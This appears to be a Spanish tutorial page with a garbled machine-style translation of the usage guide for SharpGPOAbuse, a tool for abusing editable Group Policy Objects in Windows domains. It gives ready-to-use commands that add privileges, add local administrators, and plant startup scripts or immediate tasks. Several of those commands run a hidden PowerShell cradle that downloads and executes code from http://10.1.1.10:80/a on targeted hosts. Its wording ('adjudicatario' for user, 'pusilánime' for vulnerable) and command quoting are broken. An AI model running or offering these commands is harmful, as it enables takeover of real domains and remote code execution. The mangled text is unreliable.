Tutoriales

Útil para emplear los derechos de impresión de un adjudicatario en un objeto de directiva de peña (GPO)

SharpGPOAbuse es una aplicación .NET escrita en C # que se puede utilizar para emplear los derechos de impresión de un adjudicatario en un objeto de directiva de peña (GPO) con el fin de comprometer los objetos controlados por ese GPO.

Se pueden encontrar más detalles en la subsiguiente publicación del blog: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse

Clasificar instrucciones

Asegúrese de que los paquetes NuGet necesarios estén instalados correctamente y simplemente compile el esquema en Visual Studio.

Uso

Uso: SharpGPOAbuse.exe

Tipos de ataques

Actualmente, SharpGPOAbuse admite las siguientes opciones:

Opciones de ataque

Opciones necesarias para anexar nuevos derechos de adjudicatario:
-Derechos de adjudicatario
Configure los nuevos derechos para anexar a un adjudicatario. Esta opción distingue entre mayúsculas y minúsculas y se debe utilizar una repertorio separada por comas.
-Cuenta de adjudicatario
Configure la cuenta para anexar los nuevos derechos.
–GPOName
El nombre del GPO pusilánime.

Ejemplo:
SharpGPOAbuse.exe –AddUserRights –UserRights “SeTakeOwnershipPrivilege, SeRemoteInteractiveLogonRight” –UserAccount bob.smith –GPOName “Débil GPO”

Opciones necesarias para anexar un nuevo administrador particular:
-Cuenta de adjudicatario
Establezca el nombre de la cuenta que se agregará en los administradores locales.
–GPOName
El nombre del GPO pusilánime.

Ejemplo:
SharpGPOAbuse.exe –AddLocalAdmin –UserAccount bob.smith –GPOName «Débil GPO»

  • Configuración de un script de inicio de sesión de adjudicatario o computadora

Opciones necesarias para anexar un nuevo adjudicatario o secuencia de comandos de inicio de la computadora:
–ScriptName
Establezca el nombre del nuevo script de inicio.
–ScriptContenidos
Configure el contenido del nuevo script de inicio.
–GPOName
El nombre del GPO pusilánime.

Ejemplo:
SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “powershell.exe -nop -w hidden -c ” IEX ((new-object net.webclient) .downloadstring (‘http://10.1.1.10:80/a ‘)) ”” –GPOName «GPO pusilánime»

Si desea ejecutar el script taimado solo en un adjudicatario o equipo específico controlado por el GPO pusilánime, puede anexar una explicación if internamente del script taimado:

SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “if% username% == powershell.exe -nop -w hidden -c ” IEX ((new-object net.webclient) .downloadstring (‘http: //10.1 .1.10: 80 / a ‘)) ”” –GPOName «GPO pusilánime»

  • Configuración de una computadora o tarea inmediata del adjudicatario

Opciones necesarias para anexar una nueva computadora o tarea inmediata de adjudicatario:

-Nombre de la tarea
Establezca el nombre de la nueva tarea de la computadora.
-Autor
Establezca el autor de la nueva tarea (use una cuenta de DA).
-Mando
Comando para ejecutar.
–Argumentos
Argumentos pasados ​​al comando.
–GPOName
El nombre del GPO pusilánime.

Opciones de tareas de adjudicatario adicionales:

–FilterEnabled
Habilite el filtrado de destino para las tareas inmediatas del adjudicatario.
–TargetUsername
El adjudicatario al que apuntar. La tarea maliciosa se ejecutará solo en el adjudicatario especificado. Debe tener el formato
–TargetUserSID
El SID del adjudicatario objetivo.

Opciones adicionales de tareas de computadora:
–FilterEnabled
Habilite el filtrado de destino para las tareas inmediatas de la computadora.
–TargetDnsName
El nombre DNS de la computadora a la que se dirigirá. La tarea maliciosa se ejecutará solo en el host especificado.

Ejemplo:
SharpGPOAbuse.exe –AddComputerTask –TaskName “Desempolvar” –Author DOMAIN Admin –Command “cmd.exe” –Argumentos “/ c powershell.exe -nop -w hidden -c ” IEX ((new-object net.webclient). Downloadstring (‘http://10.1.1.10:80/a’)) ”” –GPOName “Débil GPO”

Si desea ejecutar la tarea maliciosa solo en un adjudicatario o computadora específicos controlados por el GPO pusilánime, puede usar poco similar a lo subsiguiente:

SharpGPOAbuse.exe –AddComputerTask –TaskName “Desempolvar” –Author DOMAIN Admin –Command “cmd.exe” –Argumentos “/ c powershell.exe -nop -w hidden -c ” IEX ((new-object net.webclient). Downloadstring (‘http://10.1.1.10:80/a’)) ”” –GPOName “Débil GPO” –FilterEnabled –TargetDnsName target.domain.com

Opciones adicionales

OpciónDescripción
-Regulador de dominioEstablecer el compensador de dominio de destino
-DominioEstablecer el dominio de destino
-FuerzaSobrescriba los archivos existentes si es necesario

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba